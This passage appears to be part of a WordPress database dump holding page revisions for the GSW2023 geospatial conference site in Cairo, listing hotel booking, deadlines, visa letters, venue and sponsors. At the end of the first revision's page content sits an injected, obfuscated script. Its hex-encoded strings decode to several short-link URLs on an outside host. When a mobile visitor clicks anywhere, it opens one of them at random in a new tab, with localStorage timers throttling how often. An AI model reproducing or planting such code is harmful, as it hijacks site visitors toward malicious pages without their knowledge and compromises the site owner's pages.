data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:29:19','2023-08-13 12:29:19','',3066,'https://gsw2023.com/?p=5114',0,'revision','',0),
(5115,1,'2023-08-13 12:29:48','2023-08-13 12:29:48','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                           Platinum 